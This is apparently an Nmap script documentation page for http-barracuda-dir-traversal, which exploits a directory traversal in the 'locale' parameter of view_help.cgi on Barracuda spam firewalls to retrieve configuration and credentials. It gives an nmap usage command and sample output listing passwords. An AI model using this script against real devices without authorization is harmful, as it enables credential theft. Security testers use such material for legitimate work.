Script http-barracuda-dir-traversal

Script types: portrule
Categories: intrusive, exploit, auth

Script Summary

Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at

This vulnerability is in the "locale" parameter of "/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default.

Barracuda Networks Spam & Virus Firewall <= Remote Configuration Retrieval Original exploit by ShadowHatesYou <> For more information, see:

Script Arguments


Set max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.


See the documentation for the slaxml library., http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

Example Usage

nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>

Script Output

8000/tcp open  http    syn-ack Barracuda Spam firewall http config
| http-barracuda-dir-traversal:
| Users: 256
| Device: Barracuda Spam Firewall
| Version:
| Hostname: barracuda
| Domain:
| Timezone: America/Chicago
| Language: en_US
| Password: 123456
| API Password: 123456
| MTA SASL LDAP Password: 123456
| Gateway:
| Primary DNS:
| Secondary DNS:
| DNS Cache: No
| Backup Server:
| Backup Port: 21
| Backup Type: ftp
| Backup Username: user
| Backup Password: 123456
| NTP Enabled: Yes
| NTP Server:
| SSH Enabled: Yes
| BRTS Enabled: No
| BRTS Server:
| HTTP Port: 8000
| HTTP Disabled: No
| HTTPS Port: 443
| HTTPS Only: No
| Vulnerable to directory traversal vulnerability:



  • Brendan Coles

License: Same as Nmap--See